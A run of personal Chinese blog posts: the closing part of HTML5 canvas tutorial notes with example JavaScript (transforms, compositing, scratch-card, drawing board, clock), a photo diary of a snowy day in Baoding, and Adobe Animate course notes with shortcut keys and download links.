  • 让坐标系分别沿 x 轴和 y 轴缩放 5 倍和 2 倍。

    • 完整代码:
// 1. 找到画布
var c = document.getElementById('c');
// 2. 获取画笔,上下文对象
var ctx = c.getContext('2d');
// 3. 绘制图形
// 平移坐标系原点
ctx.translate(100, 100);
// 旋转并拉伸坐标系
ctx.rotate(Math.PI / 6);
ctx.scale(5, 2);
ctx.fillRect(0, 0, 50, 50);
// 注意:此时的 translate 作用在缩放后的坐标系里,实际位移会被放大 5 倍和 2 倍
ctx.translate(100, 100);
ctx.fillRect(0, 0, 50, 50);

    png
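​ 变换是会累积的:上面第二次 translate(100, 100) 发生在旋转、缩放之后的坐标系里,所以两个正方形并不是简单地错开 100px。想回到初始坐标系,可以用 setTransform 重置(示意):

ctx.setTransform(1, 0, 0, 1, 0, 0); // 恢复为单位矩阵,即初始坐标系
ctx.fillRect(0, 0, 50, 50);         // 这次绘制不再受之前变换的影响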

    20-transform 使用矩阵完成图像变换操作

    • transform(a, b, c, d, e, f),直接对变形矩阵进行修改:
  • $\begin{bmatrix} a & c & e \\ b & d & f \\ 0 & 0 & 1 \end{bmatrix}$
// 1. 找到画布
var c = document.getElementById('c');
// 2. 获取画笔,上下文对象
var ctx = c.getContext('2d');
// 3. 绘制图形
// 水平基向量变为 (1, 1),竖直基向量变为 (-1, 1),再平移 (50, 0):相当于旋转 45° 并放大 √2 倍
ctx.transform(1, 1, -1, 1, 50, 0);
ctx.fillRect(0, 0, 500, 50);

    png
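​ translate / rotate / scale 本质上都是这个矩阵的特例,可以互相改写(示意):

// translate(e, f) 等价于 transform(1, 0, 0, 1, e, f)
// scale(sx, sy)   等价于 transform(sx, 0, 0, sy, 0, 0)
// rotate(θ)       等价于 transform(cosθ, sinθ, -sinθ, cosθ, 0, 0)
let angle = Math.PI / 4;
ctx.transform(Math.cos(angle), Math.sin(angle), -Math.sin(angle), Math.cos(angle), 0, 0);
// 据此,上文的 transform(1, 1, -1, 1, 50, 0) 相当于先平移 (50, 0),再旋转 45° 并放大 √2 倍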

    21-canvas 合成图像模式

// 1. 找到画布
var c = document.getElementById('c');
// 2. 获取画笔,上下文对象
var ctx = c.getContext('2d');
// 3. 绘制图形
ctx.fillStyle = "#F00";
ctx.fillRect(300, 200, 100, 100);
// source-in:只保留新图形与已有内容重叠的部分
ctx.globalCompositeOperation = "source-in";
ctx.fillStyle = "#00F";
ctx.fillRect(250, 150, 100, 100);

    png
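​ globalCompositeOperation 一旦设置就会一直生效,用完记得切回默认值。比如用 destination-over 给已有内容垫一层背景(示意):

ctx.globalCompositeOperation = "destination-over"; // 新图形画在已有内容"下面"
ctx.fillStyle = "#eee";
ctx.fillRect(0, 0, 600, 400); // 给已有图形补一层背景
ctx.globalCompositeOperation = "source-over";      // 切回默认模式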

    22-合成图像实现刮刮卡

    #ggk{
    width: 600px;
    height: 400px;
    font-size: 30px;
    font-weight: 900;
    text-align: center;
    line-height: 400px;
    overflow: hidden;
    position: absolute;
    left: 0;
    top: 0;
    }
    <div id="ggk">谢谢惠顾</div>
    <canvas style="position: absolute; border: 1px solid #ccc; z-index: 2;" id="c" width="600" height="400"></canvas>
    • 使用 <canvas> 盖住刮刮卡背后的文字。

// 1. 找到画布
var c = document.getElementById('c');
// 2. 获取画笔,上下文对象
var ctx = c.getContext('2d');
// 3. 绘制遮罩图片
let img = new Image();
img.src = "./imgs/m2.png";
img.onload = function(){
ctx.drawImage(img, 0, 0, 600, 400);
}
var isDraw = false;
c.onmousedown = function(){
isDraw = true;
}
c.onmouseup = function(){
isDraw = false;
}
c.onmousemove = function (e) {
if (isDraw) {
var x = e.pageX;
var y = e.pageY;

ctx.globalCompositeOperation = "destination-out";
// 每次画圆前重新开始路径,避免路径不断累积
ctx.beginPath();
ctx.arc(x, y, 20, 0, 2 * Math.PI);
ctx.fill();
}
};

    let random = Math.random();
    if (random < 0.1) {
    var ggkDiv = document.querySelector("#ggk");
    ggkDiv.innerHTML = "恭喜您获得 IPHONE14 PRO 大奖!";
    }
• 按下鼠标并移动时,在鼠标所在位置不断画圆,实现刮开涂层的效果。

    • ctx.globalCompositeOperation = "destination-out"; 将圆形和遮罩重叠的部分设为透明。
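​ 实际的刮刮卡通常还会统计刮开面积,超过一定比例就自动清掉整个涂层。一个基于 getImageData 统计透明像素占比的示意(沿用上文的 c、ctx 与 isDraw,50% 的阈值是随意取的):

function scratchedRatio() {
    let data = ctx.getImageData(0, 0, c.width, c.height).data;
    let transparent = 0;
    // 每 4 个数是一个像素,下标 i + 3 为 alpha 通道
    for (let i = 0; i < data.length; i += 4) {
        if (data[i + 3] === 0) transparent++;
    }
    return transparent / (data.length / 4);
}
c.onmouseup = function () {
    isDraw = false;
    if (scratchedRatio() > 0.5) {
        ctx.clearRect(0, 0, c.width, c.height); // 刮开过半时直接清空涂层
    }
};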


    • 最终效果:

    23-裁剪路径

​ 裁切路径和普通的 canvas 图形差不多,不同的是它的作用是遮罩,用来隐藏不需要的部分:所有在路径以外的部分都不会在 canvas 上绘制出来。

    • clip() 将当前构建的路径转换为当前的裁剪路径。
    // 1. 找到画布
var c = document.getElementById('c');
// 2. 获取画笔,上下文对象
var ctx = c.getContext('2d');
    // 起点
    var heartPath = new Path2D();
    heartPath.moveTo(300, 200);// 2个控制点、1个终点
    heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
    heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke(heartPath);
    var chatPath = new Path2D();
    chatPath.moveTo(200, 300);
    chatPath.quadraticCurveTo(150, 300, 150, 200);
    chatPath.quadraticCurveTo(150, 100, 300, 100);
    chatPath.quadraticCurveTo(450, 100, 450, 200);
    chatPath.quadraticCurveTo(450, 300, 250, 300);
    chatPath.quadraticCurveTo(250, 350, 150, 350);
    chatPath.quadraticCurveTo(200, 350, 200, 300);
    ctx.clip(chatPath);
    ctx.fill(heartPath);

    // 获取图片
    let img = new Image();
    img.src = "./imgs/girl.webp";
    img.onload = function (){
    // 第一种方式绘制,(图片对象,水平位置,垂直位置)
    // ctx.drawImage(img, 0, 0);
    // 第二种方式绘制,能够缩放图片(图片对象,水平位置,垂直位置,缩放到对应宽度,缩放到对应高度)
    ctx.drawImage(img, 0, 0, 600, 400);
    // 第三种方式绘制,能够裁剪图片,img 参数后面的四个参数分别为源图片上面你要裁剪的起点位置和矩形的宽高,后面四个参数分别为画布的位置和要渲染的矩形的宽高
    ctx.drawImage(img, 640, 0, 1280, 720, 0, 0, 600, 400);
    // 给对话框描边
    ctx.lineWidth = 20;
    ctx.stroke(chatPath);
    }

    png
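​ 注意 clip() 设置后会一直限制后续绘制。若只想临时裁剪,常见做法是配合下一节的 save() / restore() 使用(示意,沿用上文的 chatPath 与 img,需在 img.onload 内执行):

ctx.save();         // 先保存未裁剪的状态
ctx.clip(chatPath); // 裁剪只对之后的绘制生效
ctx.drawImage(img, 0, 0, 600, 400);
ctx.restore();      // 恢复后,绘制不再受裁剪路径限制
ctx.stroke(chatPath);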

    24-状态的保存和恢复

    • save() 将当前状态压入一个栈中。
    • restore() 从栈中取出一个状态并应用之。
// 1. 找到画布
var c = document.getElementById('c');
// 2. 获取画笔,上下文对象
var ctx = c.getContext('2d');
// 3. 绘制图形
ctx.fillStyle = "red";
ctx.fillRect(0, 0, 100, 100);
ctx.save(); // 状态栈:[red]

ctx.fillStyle = "blue";
ctx.fillRect(100, 100, 100, 100);
ctx.save(); // 状态栈:[red, blue]

ctx.fillStyle = "yellow";
ctx.fillRect(200, 200, 100, 100);
ctx.save(); // 状态栈:[red, blue, yellow]

ctx.fillStyle = "green";
ctx.fillRect(300, 300, 100, 100);
ctx.save(); // 状态栈:[red, blue, yellow, green]

ctx.restore(); // 弹出 green 状态
ctx.fillRect(400, 400, 100, 100); // 绿色

ctx.restore(); // 弹出 yellow 状态
ctx.fillRect(500, 500, 100, 100); // 黄色

ctx.restore(); // 弹出 blue 状态
ctx.fillRect(600, 600, 100, 100); // 蓝色

ctx.restore(); // 弹出 red 状态
ctx.fillRect(700, 700, 100, 100); // 红色

    png

    25-像素操作

    png

    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
var ctx = c.getContext('2d');

    // 获取图片
    let img = new Image();
    img.src = "imgs/girl.webp";
    img.onload = function (){
    ctx.drawImage(img, 0, 0, 600, 400);

    let imageData = ctx.getImageData(0, 0, 600, 400);
    console.log(imageData);
    // 循环修改数据
    for (let i = 0; i < imageData.data.length; i+= 4)
    {
    let gray = imageData.data[i] * 0.3 + imageData.data[i + 1] * 0.59 + imageData.data[i + 2] * 0.11;
    imageData.data[i] = gray;
    imageData.data[i + 1] = gray;
    imageData.data[i + 2] = gray;
    imageData.data[i + 3] = 255;
    }
    ctx.putImageData(imageData, 0, 0, 0, 0, 300, 400);
    }

    png
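​ 换一组像素运算就能得到别的滤镜,比如反色(示意,沿用上文 img.onload 里的 imageData 处理流程):

for (let i = 0; i < imageData.data.length; i += 4) {
    imageData.data[i]     = 255 - imageData.data[i];     // R
    imageData.data[i + 1] = 255 - imageData.data[i + 1]; // G
    imageData.data[i + 2] = 255 - imageData.data[i + 2]; // B
    // alpha 通道保持不变
}
ctx.putImageData(imageData, 0, 0);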

    26-高级封装绘制元素和实现元素交互

    • 这节大概是讲怎么应用面向对象的思想吧……

• 用 JavaScript 创建一个 Heart 类,在 constructor() 构造函数里构建路径,使用 draw() 绘制图案。
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
var ctx = c.getContext('2d');

    class Heart{
    constructor(x, y){
    this.x = x;
    this.y = y;
    this.heartPath = new Path2D();
    this.heartPath.moveTo(this.x, this.y);
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    }
    draw(){
    ctx.save();
    ctx.fillStyle = "red";
    ctx.fill(this.heartPath);
    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    heart.draw();
• 再设计一下画布的 onmousemove 事件,让鼠标移到图案上时图案变色:
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
var ctx = c.getContext('2d');

    class Heart{
    constructor(x, y){
    this.x = x;
    this.y = y;
    this.color = "red";
    this.heartPath = new Path2D();
    this.heartPath.moveTo(this.x, this.y);
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    c.onmousemove = (e) => {
    let x = e.offsetX;
    let y = e.offsetY;
    let isIn = ctx.isPointInPath(this.heartPath, x, y);
    if (isIn)
    {
    this.color = "blue";
    }else{
    this.color = "red";
    }
    }
    }
    draw(){
    ctx.save();
    ctx.fillStyle = this.color;
    ctx.fill(this.heartPath);
    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    function render(){
    ctx.clearRect(0, 0, c.width, c.height);
    heart.draw();
    requestAnimationFrame(render);
    }
    render();

    更牛逼的写法……emmm 学不来。

• 创建一个 Heart 对象,并注册其 onHover、onLeave 事件:当鼠标悬停在心形图形上时,颜色变为蓝色;当鼠标离开时,颜色变回红色。

    • 创建一个 render 函数,使用 requestAnimationFrame 方法定期重新绘制心形图形,从而实现动画效果。

// c1 为页面中的画布元素(获取画布的代码此处从略)
var ctx = c1.getContext("2d");

    class Heart {
    constructor(x, y) {
    this.x = x;
    this.y = y;
    this.color = "red";
    this.isIn = false;
    this.eventMapList = {
    hover: [],
    leave: [],
    };

    c1.onmousemove = (e) => {
    let x = e.offsetX;
    let y = e.offsetY;
    this.isIn = ctx.isPointInPath(this.heartPath, x, y);
    if (this.isIn) {
    this.eventMapList.hover.forEach((item) => {
    item();
    });
    } else {
    this.eventMapList.leave.forEach((item) => {
    item();
    });
    }
    };
    }
    onHover(fn) {
    this.eventMapList.hover.push(fn);
    }
    onLeave(fn) {
    this.eventMapList.leave.push(fn);
    }
    setPosition(x, y) {
    this.x = x;
    this.y = y;
    }
    draw() {
    this.heartPath = new Path2D();
    // 起点
    this.heartPath.moveTo(this.x, this.y);
    // 2 个控制点、1 个终点
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    ctx.save();
    ctx.fillStyle = this.color;
    ctx.fill(this.heartPath);

    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    heart.onHover(() => {
    heart.color = "blue";
    });
    heart.onLeave(() => {
    heart.color = "red";
    });
    function render() {
    ctx.clearRect(0, 0, c1.width, c1.height);
    heart.draw();
    requestAnimationFrame(render);
    }
    render();

    27-canvas 实现在线画板

    • 设置若干按钮:

      • boldBtn 粗画笔

        • 调整模式为画笔模式 source-over
        • 将画笔粗细设为 20
        • 设置按钮显示状态
        boldBtn.onclick = function () {
        ctx.globalCompositeOperation = 'source-over';
        ctx.lineWidth = 20;
        boldBtn.classList.add('active');
        thinBtn.classList.remove('active');
        clearBtn.classList.remove('active');
        }
      • thinBtn 细画笔

        • 调整模式为画笔模式 source-over

        • 将画笔粗细设为 1

        • 设置按钮显示状态

        thinBtn.onclick = function () {
        ctx.globalCompositeOperation = 'source-over';
        ctx.lineWidth = 1;
        thinBtn.classList.add('active');
        boldBtn.classList.remove('active');
        clearBtn.classList.remove('active');
        }
      • saveBtn 保存图像

        • 把当前画布下载并保存
        saveBtn.onclick = function () {
        var urlData = canvas.toDataURL();
        var downloadA = document.createElement('a');
        downloadA.setAttribute('download', '酷炫签名');
        downloadA.href = urlData;
        downloadA.click();
        }
      • color 调色

        • 设置画笔颜色
        inputColor.onchange = function () {
        ctx.strokeStyle = inputColor.value;
        }
      • clearBtn 橡皮擦

        • 调整模式为擦除模式 destination-out
        • 将画笔粗细设为 30
        • 设置按钮显示状态
        clearBtn.onclick = function () {
        ctx.globalCompositeOperation = 'destination-out';
        ctx.lineWidth = 30;
        clearBtn.classList.add('active');
        thinBtn.classList.remove('active');
        boldBtn.classList.remove('active');
        }
      • nullBtn 清空画布

        nullBtn.onclick = function () {
        ctx.clearRect(0, 0, 800, 600);
        }
    <canvas id="c" width="600" height="400">
    当前浏览器不支持 canvas,请下载最新的浏览器
    <a href="https://www.google.cn/intl/zh-CN/chrome/">立即下载</a>
    </canvas>
    <hr>
    <button id="boldBtn" type="button">粗线条</button>
    <button id="thinBtn" class="active" type="button">细线条</button>
    <button id="saveBtn" type="button">保存签名</button>
    <input type="color" name="" id="color" value="" />
    <button id="clearBtn">橡皮擦</button>
    <button id="nullBtn">清空画布</button>

    <script>
    // 1. 找到画布
    var canvas = document.getElementById("c");

    // 判断是否有 getContext
    if (!canvas.getContext) {
    console.log("当前浏览器不支持 canvas,请下载最新的浏览器");
    }
    // 2. 获取画笔,上下文对象
    var ctx = canvas.getContext("2d");

    var boldBtn = document.querySelector('#boldBtn');
    var thinBtn = document.querySelector('#thinBtn');
    var inputColor = document.querySelector('#color');
    // 保存签名
    var saveBtn = document.querySelector('#saveBtn');
    // 橡皮擦按钮
    var clearBtn = document.querySelector('#clearBtn');
    // 清空画布
    var nullBtn = document.querySelector('#nullBtn');
    // 设置允许绘制的变量
    var isDraw = false;

canvas.onmousedown = function (e) {
isDraw = true;
ctx.beginPath();
var x = e.pageX - canvas.offsetLeft;
var y = e.pageY - canvas.offsetTop;
ctx.moveTo(x, y);
}

    canvas.onmouseleave = function () {
    isDraw = false;
    ctx.closePath();
    }

    canvas.onmouseup = function () {
    isDraw = false;
    ctx.closePath();
    }

canvas.onmousemove = function (e) {
if (isDraw) {
var x = e.pageX - canvas.offsetLeft;
var y = e.pageY - canvas.offsetTop;
ctx.lineTo(x, y);
ctx.stroke();
}
}

    boldBtn.onclick = function () {
    ctx.globalCompositeOperation = 'source-over';
    ctx.lineWidth = 20;
    boldBtn.classList.add('active');
    thinBtn.classList.remove('active');
    clearBtn.classList.remove('active');
    }

    thinBtn.onclick = function () {
    ctx.globalCompositeOperation = 'source-over';
    ctx.lineWidth = 1;
    thinBtn.classList.add('active');
    boldBtn.classList.remove('active');
    clearBtn.classList.remove('active');
    }

    clearBtn.onclick = function () {
    ctx.globalCompositeOperation = 'destination-out';
    ctx.lineWidth = 30;
    clearBtn.classList.add('active');
    thinBtn.classList.remove('active');
    boldBtn.classList.remove('active');
    }

    nullBtn.onclick = function () {
    ctx.clearRect(0, 0, 800, 600);
    }

    saveBtn.onclick = function () {
    var urlData = canvas.toDataURL();
    var downloadA = document.createElement('a');
    downloadA.setAttribute('download', '酷炫签名');
    downloadA.href = urlData;
    downloadA.click();
    }

    inputColor.onchange = function () {
    ctx.strokeStyle = inputColor.value;
    }
    </script>
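​ 画笔线条的转折处默认是尖角,签名类应用一般把端点和拐角都设成圆的,线条会顺滑很多(示意,加在获取 ctx 之后即可):

ctx.lineCap = "round";  // 线段端点画成圆头
ctx.lineJoin = "round"; // 折线拐角画成圆角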

    28-canvas 绘制动态时钟

    • var time = new Date(); 获取当前时间

• render() 中通过 requestAnimationFrame 每帧重绘:

      • 绘制表盘
        • 时针刻度
        • 分针刻度
      • 绘制指针
        • 时针
        • 分针
        • 秒针
    var c = document.querySelector("#c");
    var ctx = c.getContext("2d");

    function render() {
    ctx.clearRect(0, 0, 800, 600);
    // 存档,保存当前坐标位置和上下文对象的状态
    ctx.save();
    ctx.translate(400, 300);
    ctx.rotate(-Math.PI / 2);

    ctx.save();
    for (var i = 0; i < 12; i++) {
    // 绘制小时的刻度
    ctx.beginPath();
    ctx.moveTo(170, 0);
    ctx.lineTo(190, 0);
    ctx.lineWidth = 8;
    ctx.strokeStyle = "gray";
    ctx.stroke();
    ctx.closePath();
    ctx.rotate((2 * Math.PI) / 12);
    }

    ctx.restore();
    ctx.save();
    for (var i = 0; i < 60; i++) {
// 绘制分钟的刻度
    ctx.beginPath();
    ctx.moveTo(180, 0);
    ctx.lineTo(190, 0);
    ctx.lineWidth = 2;
    ctx.strokeStyle = "gray";
    ctx.stroke();
    ctx.closePath();
    ctx.rotate((2 * Math.PI) / 60);
    }
    ctx.restore();
    ctx.save();

    // 获取当前时间
    var time = new Date();
    var hour = time.getHours();
    var min = time.getMinutes();
    var sec = time.getSeconds();
    hour = hour >= 12 ? hour - 12 : hour;

    // 绘制秒针
    ctx.rotate(((2 * Math.PI) / 60) * sec);
    ctx.beginPath();
    ctx.moveTo(-30, 0);
    ctx.lineTo(190, 0);
    ctx.lineWidth = 2;
    ctx.strokeStyle = "red";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.save();

    // 绘制分针
    ctx.rotate(
    ((2 * Math.PI) / 60) * min + ((2 * Math.PI) / 60 / 60) * sec
    );
    ctx.beginPath();
    ctx.moveTo(-20, 0);
    ctx.lineTo(130, 0);
    ctx.lineWidth = 4;
    ctx.strokeStyle = "#888";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.save();

// 绘制时针
    ctx.rotate(
    ((2 * Math.PI) / 12) * hour +
    ((2 * Math.PI) / 12 / 60) * min +
    ((2 * Math.PI) / 12 / 60 / 60) * sec
    );
    ctx.beginPath();
    ctx.moveTo(-15, 0);
    ctx.lineTo(110, 0);
    ctx.lineWidth = 8;
    ctx.strokeStyle = "#333";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.restore();
    requestAnimationFrame(render);
    }

    render();

​ 最终效果:一个实时显示当前时间的动态时钟。

/posts/Diary-%E4%B8%8D%E4%BC%9A%E5%90%A7%E4%B8%8D%E4%BC%9A%E5%90%A7%E4%B8%8D%E4%BC%9A%E8%BF%98%E6%9C%89%E4%BA%BA%E6%B2%A1%E8%A7%81%E8%BF%87%E9%9B%AA%E5%90%A7/
    前言

    ​ 河北省气象台发布天气实况,10 日白天到 11 日早晨,除承德东部、唐山、秦皇岛外,全省其他大部地区出现降雪天气,降雪区平均降水量 5.8 毫米

    ​ 人生中第一次见到,不得好好记录下?


    ​ 本次博客添加全新下雪特效😇!

    <div><canvas id="snow" style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999;pointer-events:none"></canvas></div>
    <script>const notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));</script>
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/gh/Candinya/Kratos-Rebirth@latest/source/js/snow.min.js"></script>
    <script>const snow = document.getElementById("snow");
    const postDiv = document.querySelector(".post");
    postDiv.appendChild(snow);
    </script>

    正文

    12.10

    ​ 按之前的天气预报,这天白天会下中雪,结果白天一看转成多云了🤨,真是太不幸运了!

    21:51 下雪了!

    jpg

​ 同门拍视频告诉我下雪了,我赶忙跑到宿舍窗台看,吃了一阵西北风🙄。大晚上下雪估计只有在路灯底下才能看到吧。

    ​ 这天 3 楼洗衣房断网了,所以没得洗衣服,计划第二天凌晨去 1 楼洗衣房把衣服洗了。

    12.11

    05:06 白雪皑皑

    jpg

    ​ 大早上爬起来看看窗外,好家伙半夜下的雪可真够大的,整个地板都是白色了。

    ​ 还好机智的我早已把电瓶车移到了室内😎!没得被淋。

    ​ 然后就下楼把衣服扔洗衣机了。

    05:10 雪落大地

    jpg

    ​ 宿管阿姨要 6 点才开门,只好在宿舍楼里趴向窗台看雪,窗台上已经堆了厚厚的一层,把雪聚起来捏一捏扔下去玩。

    06:03 垃圾桶

    jpg

    ​ 出去解决一下早餐问题,外面好一片繁华景象!就连垃圾桶都这么有特色🤪。一大早扫雪大爷还没来得及扫雪,于是我踢雪玩。

    06:06 雪还在下!

    gif

    ​ 天空还在下雪,感觉跟棉絮一样。

    ​ 冀大还有瓷砖地板,得小心翼翼避免滑倒。

    06:58 河宝,还是河贝

    jpg

    ​ 解决完早饭,晾好衣服,准备去看看外面的世界!

    ​ 冀大的吉祥物都长了白白的眉毛。

    07:01 出!

    jpg

    ​ 刚刚日出的保定。

    07:24 东湖公园

    jpg

    ​ 到东湖公园擦个边,雪已经积到了结冰的湖面上。

    ​ 我觉得下雪的古莲花池一定很好看,于是乘公交车去古莲花池。这段时间保定提倡节能减排,12.11 - 12.31 公交免费,好评!周一早高峰 5 km 堵了 1 小时,差评!

    ​ 在公交车上还被保定大妈指指点点,说小伙子你怎么踢得满鞋子都是雪😇。

    08:32 西大街

    jpg

    ​ 堵得实在受不了了,这速度跟走路都差不多了。看了下刚好到西大街,提前下车!

    08:34 花灯笼

    jpg

    ​ 保定版三坊七巷还是那么崭新又衰败。

    08:34 积雪雕塑大爷

    jpg

    ​ 旁边的雕塑给我看乐了。

    08:52 神秘的光园

    jpg

    ​ 贯穿西大街再迂回至古莲花池,这段路我已经熟悉得不怎么依靠导航了。

    ​ 半路中三刷光园,很好它还是不开门。

    08:55 长信宫灯

    jpg

    ​ 总督署门口的假 · 长信宫灯。

    09:00 石狮

    jpg

    ​ 古莲花池门口的白头发石狮子。旁边一堆铲雪大爷大妈。

    09:01 三刷古莲花池

    jpg

    ​ 三刷古莲花池,¥30。售票员还说了一句今天应该会有很多人拍照😇。

    ​ 怪石上的积雪蛮好看的。

    09:04 直隶图书馆

    jpg

    ​ 直隶图书馆门口的白头发石狮子。

    09:05 桥与亭

    jpg

    ​ 又见面了,一桥和一亭!后来看别人的摄影作品感觉往后面走从门洞里面拍也不错,下次可以试试🤔。

    09:06 走廊

    jpg

    ​ 花花绿绿的走廊里,花白的走廊外。

    09:14 经典高手位

    jpg

    ​ 又来到了经典高手位,三刷古莲花池,三拍高手位。

    09:19 柳树下

    jpg

    ​ 新高手位——从柳树枝叶的缝隙间拍宛虹亭。

    09:22 观澜亭

    jpg

    ​ 白屋顶观澜。

    09:25 告辞!古莲花池!

    jpg

    ​ 走了两圈该撤了。

    09:34 天主教堂

    jpg

    ​ 来到了天主教堂!正门有个建筑物十分讨厌,只能从旁边开广角才能拍出教堂的全貌。

    ​ 天主教堂前面已经扫得很干净,很勤快啊!

    09:35 耶稣

    jpg

    ​ 雪松下的十字架。

    09:36 圣母玛丽亚

    jpg

    ​ 白雪包围的圣母玛利亚。

    09:38 十字架

    jpg

    ​ 积雪的十字架。

    09:45 大慈阁

    jpg

    ​ 再去看看大慈阁。之前听说大慈阁年久失修被取消了 AA 级景区评级,这次到门口直接关门不让进了😅。侧边拍一张,准备下一站——动物园!

    09:51 人民照像

    jpg

    ​ 再次横穿西大街。

    10:17 平房

    jpg

    ​ 前往动物园,途中护城河旁边的小巷子。

    ​ 动物园冷清得让我在外面看以为它关门了😇,后来才觉得很少会有傻子下雪天逛动物园,动物全在睡大觉。

    10:35 猴哥

    jpg

    ​ 吃雪的猴哥。

    jpg

    ​ 攀爬的猴哥。

    ​ 顺带一提,据说这个猴山非常牛逼,石头是从圆明园里搬出来的。

    10:37 别有洞天

    jpg

    ​ 鸟类馆里的别有洞天。

    10:39 鸟哥

    jpg

    ​ 雪地上的各种鹤。

    10:45 睡大觉哥

    jpg

    ​ 本来来动物园的目的就是能看老虎能在雪上漫步呢,好吧也想过它十有八九在睡大觉😅。

    jpg

    ​ 那就 P 一只老虎上去。

    10:49 保定古城墙

    jpg

    ​ 据说,动物园北边的墙是保定城的古城墙。

    10:50 城墙上

    jpg

    ​ 城墙上的积雪。

    10:53 二刷猴哥

    jpg

    ​ 这时候手机快没电了,注意到入口那里有个工作人员电瓶车充电桩,于是又回去偷偷充电。

    ​ 于是又见到你了!猴哥!

    ​ 逛完动物园差不多也该回去了,我想保定市区也就这些地方比较好玩了,极限半天速通保定!该回冀大了。

    11:58 狗子

    jpg

    ​ 冀大门口玩雪的狗子。

    12:23 银杏大道

    jpg

    ​ 被踩得稀烂的雪。

    12:24 松树

    jpg

    ​ 宿舍楼门口的松树。行了累了差不多该午睡了。

    ​ 舍友说下午带我堆雪人捏,我还特意看了网课——如何堆雪人:先揉一个雪球,然后在地上滚,越滚越大就行了。

    14:33 小雪人

    jpg

    ​ 已经到了下午了,看来上午有很多人已经堆起了雪人🤔。

    14:38 唐僧

    jpg

    ​ 抽烟的唐僧。

    14:40 大雪人

    jpg

    ​ 操场上居然有一人高的雪人,真是太牛逼了!

    ​ 试了一会儿没堆起来,而且我忘记戴手套了,太冷了,改打雪仗了。

    ​ 打不过,被解哥暴击😇。

    14:50 杰哥牌山西刀削面

    jpg

    ​ 杰哥用小刀把雪球削成方的,做了个骰子,结果一扔就散了。

    15:16 杰哥牌人工降雪

    jpg

    ​ 杰哥表演了一下人工降雪,用脚踢树,然后树下的人就会落汤鸡😇。

    jpg

    ​ 粉红仔解哥:🙂。

    总结

    jpg
    西大街 光园 古莲花池 直隶图书馆 宛虹亭 天主教堂 大慈阁 动物园 冀大
    jpg
/posts/Software-AN/

资源
哈喽!各位小可爱终于等到你~这是【AN】已经更新的课程素材哦~本素材会陆续更新,小可爱们回复 AN 就可以获取~
    【0-1-AN 如何安装】-本节课没有素材哦~

    【0-2-AN 界面篇】-本节课没有素材哦,小伙伴们认真听 Genji 老师讲解并做笔记~

    【1-1-AN 如何绘制一个基础图案】链接:https://pan.baidu.com/s/14TM5wfdvy9i7whDBaMDu1A 提取码:0000

    【1-2-罗小黑逐帧动画是如何制作的】链接:https://pan.baidu.com/s/1fLM-oW_OpFQl538BpsK50w 提取码:0000

    【1-3-传统补间动画制作】
    【1-3.1-传统补间动画制作-开屏动画】
    【1-3.2-传统补间动画制作-闪耀字母】链接:https://pan.baidu.com/s/1jli9HpHcsfpa3GqekG8QMA 提取码:0000

    【2-1 引导层建立投篮动画】链接:https://pan.baidu.com/s/17wjkrLxZw3iJZ-Bz2N08ww 提取码:0000

    【2-2 遮罩图层建立地球仪】链接:https://pan.baidu.com/s/1RzEYYikYlysofgatX2ubvw 提取码:0000


    课程

    【0-2-AN先导课】- AN界面篇

    • F5 创建普通帧。

    • Shift + F5 删除帧。

    • F6 创建关键帧。

    • F7 创建空白关键帧。

    【1-1-AN入门课】- AN如何绘制一个基础图案

    png

    ​ 工程下新建一个帧,拖入素材,将这个图层锁了,再新建一个图层。

    png

    ​ 矩形工具按 Shift 拉一个正方形,颜色面板选择线性渐变,油漆桶拉上去。

    png

​ 钢笔工具抠一个"f",油漆桶涂上白色。

    【1-2-AN入门课】- 罗小黑逐帧动画是如何制作的

    png

​ 导入多张图片,按 F7 新建空白关键帧并拖入图片,交替操作把这些图片按顺序放进每一帧。Alt + Shift + E 编辑多个帧。

    Ctrl + A 选择所有帧的图片。

    png

    ​ 使用对齐将它们对齐,拉到适应大小。

    png

    Ctrl + Enter 浏览动画。

    png

    ​ 减缓动画播放速度。选中某帧,按 F5 复制一个新的帧。

    gif

    ​ 最终效果。

    【1-3-AN入门课】- 传统补间动画制作

    png

    ​ 矩形工具拉一个正方形,F8 转换为图形元件。

    png

    ​ 在另一关键帧上随意变换这个元件。

    png

    ​ 在前一段关键帧中,创建传统补间

    png

    Ctrl + C 复制元件。

Ctrl + Shift + V 粘贴元件,且粘贴位置与复制帧的位置相同。

    gif

    ​ 最终效果。

    【1-3.1-AN练习课】- 传统补间动画制作开屏动画

    png

    ​ 选中传统补间动画的某一帧,可以修改补间的效果曲线。

    gif

    ​ 最终效果。

    【1-3.2-AN练习课】- 传统补间动画制作闪耀字母

    png

    ​ 文字工具打字,然后选中这个文字,Ctrl + B 将文字打散。

    png

Ctrl + X 与 Ctrl + Shift + V 交替操作,让各个字符处于各自的图层中。

    png

    ​ 创建补间动画:

